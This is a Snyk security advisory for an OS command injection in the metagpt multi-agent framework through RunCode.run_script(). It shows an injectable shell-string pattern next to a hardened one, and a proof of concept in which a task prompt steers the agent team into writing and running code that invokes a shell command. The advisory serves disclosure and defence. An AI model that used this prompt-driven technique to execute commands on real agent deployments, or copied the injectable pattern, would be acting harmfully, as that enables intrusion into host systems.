OS Command Injection Affecting metagpt package, versions [0,]


Severity

Snyk recommended: medium (CVSS assessment made by Snyk's Security Team)

Threat Intelligence
  • Exploit Maturity: Proof of concept
  • EPSS: 0.05% (24th percentile)

  • Snyk ID SNYK-PYTHON-METAGPT-6184700
  • published 30 Jan 2024
  • disclosed 22 Jan 2024
  • credit fubuki8087

How to fix?

There is no fixed version for metagpt.

Overview

metagpt is a multi-agent framework.

Affected versions of this package are vulnerable to OS Command Injection via the RunCode.run_script() method. An attacker with the QaEngineer role can execute arbitrary commands on the system by injecting shell metacharacters into the input parameters.
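To make the failure mode concrete, the injectable launch pattern next to a hardened one, as an added example that is not metagpt's own code: build_shell_command_vulnerable, build_argv_hardened, is_accepted and run_script_hardened are hypothetical names, and the example assumes that run_script receives a script name that ends up on a shell command line.

```python
import re
import subprocess
from pathlib import Path
from typing import List, Tuple

# Hypothetical reimplementation for illustration; not metagpt's RunCode code.

# Only plain path characters are accepted in a script name; anything a shell
# could interpret (';', '|', '&', '$', '`', quotes, whitespace, ...) is refused.
SAFE_SCRIPT_NAME = re.compile(r"^[A-Za-z0-9_./-]+$")


def build_shell_command_vulnerable(working_dir: str, script: str) -> str:
    """Injectable pattern: the script name is spliced into a shell command line,
    so metacharacters in it are parsed by /bin/sh instead of naming a file."""
    return f"cd {working_dir} && python {script}"


def build_argv_hardened(working_dir: str, script: str) -> List[str]:
    """Hardened pattern: validate the name, confine it to the working directory,
    and return an argv list so no shell is ever involved."""
    if not SAFE_SCRIPT_NAME.match(script):
        raise ValueError(f"script name contains disallowed characters: {script!r}")
    root = Path(working_dir).resolve()
    target = (root / script).resolve()
    if root not in target.parents:  # "../x.py" or an absolute path escapes root
        raise ValueError(f"script path escapes working directory: {script!r}")
    if target.suffix != ".py":
        raise ValueError(f"refusing non-Python script: {script!r}")
    return ["python", str(target)]


def is_accepted(working_dir: str, script: str) -> bool:
    """True if the hardened builder accepts the script name, False if it rejects it."""
    try:
        build_argv_hardened(working_dir, script)
        return True
    except ValueError:
        return False


def run_script_hardened(working_dir: str, script: str, timeout: int = 30) -> Tuple[str, str, int]:
    """Run the validated script with a list argv (shell=False), capturing its output."""
    argv = build_argv_hardened(working_dir, script)
    proc = subprocess.run(argv, cwd=working_dir, capture_output=True, text=True, timeout=timeout)
    return proc.stdout, proc.stderr, proc.returncode
```

The allowlist and directory confinement are what keep agent-generated file names from reaching a shell; the vulnerable builder is shown only for contrast and is never executed.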

PoC

import os
# The PoC needs a working OpenAI key; the value is elided here.
os.environ["OPENAI_API_KEY"] = "sk-..."

import asyncio
from metagpt.roles import (
    ProductManager,
    Architect,
    ProjectManager,
    Engineer,
    QaEngineer
)
from metagpt.team import Team

async def startup(idea: str):
    # Assemble the standard MetaGPT software-company team, including the
    # QaEngineer role that runs generated tests through RunCode.run_script().
    company = Team()
    company.hire(
        [
            ProductManager(),
            Architect(),
            ProjectManager(),
            Engineer(),
            QaEngineer()
        ]
    )
    company.invest(investment=1.0)
    company.run_project(idea=idea)

    await company.run(n_round=16)

async def app(user_prompt):
    await startup(idea=user_prompt)

if __name__ == "__main__":
    # The natural-language task steers the agents into generating and then
    # executing code that invokes a shell command.
    user_input = "I want to execute shell command `ls -l`. Please help me write a piece of code and test this code."
    asyncio.run(app(user_input))


CVSS Scores

CVSS version 3.1

Snyk (Recommended): 6.4 medium
  • Attack Vector (AV): Network
  • Attack Complexity (AC): Low
  • Privileges Required (PR): Low
  • User Interaction (UI): None
  • Scope (S): Changed
  • Confidentiality (C): Low
  • Integrity (I): None
  • Availability (A): Low

NVD: 8.8 high